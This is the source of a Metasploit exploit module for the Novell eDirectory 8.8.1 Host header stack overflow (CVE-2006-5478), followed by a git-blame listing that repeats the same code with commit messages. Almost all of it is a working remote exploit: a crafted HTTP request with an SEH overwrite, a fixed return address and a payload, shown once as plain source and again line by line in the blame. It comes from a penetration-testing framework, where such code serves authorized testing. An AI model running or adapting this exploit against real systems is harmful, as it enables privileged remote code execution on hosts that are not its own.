modules/exploits/windows/http/edirectory_host.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Novell eDirectory NDS Server Host Header Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.
        The web interface does not validate the length of the
        HTTP Host header prior to using the value of that header in an
        HTTP redirect.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2006-5478'],
          ['OSVDB', '29993'],
          ['BID', '20655'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload'        =>
        {
          'Space'    => 600,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Oct 21 2006',
      'DefaultTarget' => 0))

    register_options([Opt::RPORT(8028)])
  end

  def exploit
    connect

    sploit =  "GET /nds HTTP/1.1" + "\r\n"
    sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars)
    sploit << "," + rand_text_alphanumeric(719, payload_badchars)
    seh    = generate_seh_payload(target.ret)
    sploit[705, seh.length] = seh
    sploit << "\r\n\r\n"

    print_status("Trying target #{target.name}...")

    sock.put(sploit)

    handler
    disconnect
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 16:28:54 -05:00			`Rank = GreatRanking`
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::Seh`
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Novell eDirectory NDS Server Host Header Overflow',`
			`'Description' => %q{`
			`This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.`
			`The web interface does not validate the length of the`
			`HTTP Host header prior to using the value of that header in an`
			`HTTP redirect.`
			`},`
			`'Author' => 'MC',`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`['CVE', '2006-5478'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '29993'],`
Retab modules 2013-08-30 16:28:54 -05:00			`['BID', '20655'],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'seh',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 600,`
			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",`
			`'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll`
			`],`
			`'Privileged' => true,`
			`'DisclosureDate' => 'Oct 21 2006',`
			`'DefaultTarget' => 0))`
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`register_options([Opt::RPORT(8028)])`
Retab modules 2013-08-30 16:28:54 -05:00			`end`
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def exploit`
			`connect`
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`sploit = "GET /nds HTTP/1.1" + "\r\n"`
			`sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars)`
			`sploit << "," + rand_text_alphanumeric(719, payload_badchars)`
			`seh = generate_seh_payload(target.ret)`
			`sploit[705, seh.length] = seh`
			`sploit << "\r\n\r\n"`
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`print_status("Trying target #{target.name}...")`
added exploit module edirectory_host.rb 2006-10-27 14:25:42 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`sock.put(sploit)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`handler`
			`disconnect`
			`end`
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`end`